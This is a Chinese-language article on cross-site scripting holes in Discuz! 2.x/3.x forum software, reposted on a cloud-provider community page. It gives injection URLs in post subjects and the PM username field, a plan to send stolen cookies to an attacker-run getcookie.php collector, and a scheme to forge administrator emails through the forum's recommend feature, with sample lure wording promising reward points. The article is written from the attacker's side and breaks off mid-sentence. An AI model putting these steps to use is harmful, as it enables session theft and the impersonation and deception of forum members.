Discuz!跨站大全_PHP

來源:互聯網
上載者:User
關鍵字 大全 漏洞 cookie 可以 Discuz 論壇 dis
在discuz!的發貼、回貼、PM等中的subject都沒有經過過濾,所以也可以添加代碼。
例如
http://xxx/post.php?action=newthread&fid=2...cript%3E%3Cb%22

效果是首先彈出自己的cookie
利用方法:把上述代碼放置到img中。

適用版本:discuz!2.x
discuz!3.x
一種利用discuz!2.0漏洞進行欺騙獲得cookie的嘗試

通過測試XXXFan論壇的PM功能存在一個安全性漏洞,具體描述如下:
XXXFan的給某個會員發送悄悄的連結如下(假定這個會員名字為XXXFan)
http://XXX/pm.php?action=send&username=XXXFan

因為論壇程式對會員名字沒有進行過濾,而是直接顯示在發送到欄目中(TO:),所以可以在名字後面加上script代碼。例如

http://XXX/pm.php?action=send&username=XXXFan ";>
上面的連結點擊以後首先彈出的是自己的cookie內容。
當然我們可以先在自己的網站上構造一個程式來收集cookie,類似於
getcookie.php?cookie=

但是如何來誘使會員點擊呢,如果簡單的放在論壇上,太容易被識別。所以可以利用discuz論壇程式的另外一個功能,“文章介紹給朋友”功能。

因為discuz的這個功能對填寫的emial地址沒有進行任何過濾、辨別和模版,可以偽造任何人給別人發信,安全性很高。利用這個功能我們就可以偽造ExploitFan的管理員給某個會員發一封信,誘使會員點擊我們準備的URL,如果誘使就看自己的手段了,例如可以說“論壇正在測試新功能,請您協助點擊上面地址,我們會在後台記錄您的點擊在合適的時間會給您增加積分以做獎勵”等等。

因為連結地址是XXXFan的,而且發信人和郵件地址都是XXXFan的官方地址,所以可信度非常高,而且不會留下任何把柄。當然為了更高的安全性,可以在
相關文章

聯繫我們

該頁面正文內容均來源於網絡整理,並不代表阿里雲官方的觀點,該頁面所提到的產品和服務也與阿里云無關,如果該頁面內容對您造成了困擾,歡迎寫郵件給我們,收到郵件我們將在5個工作日內處理。

如果您發現本社區中有涉嫌抄襲的內容,歡迎發送郵件至: info-contact@alibabacloud.com 進行舉報並提供相關證據,工作人員會在 5 個工作天內聯絡您,一經查實,本站將立刻刪除涉嫌侵權內容。

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.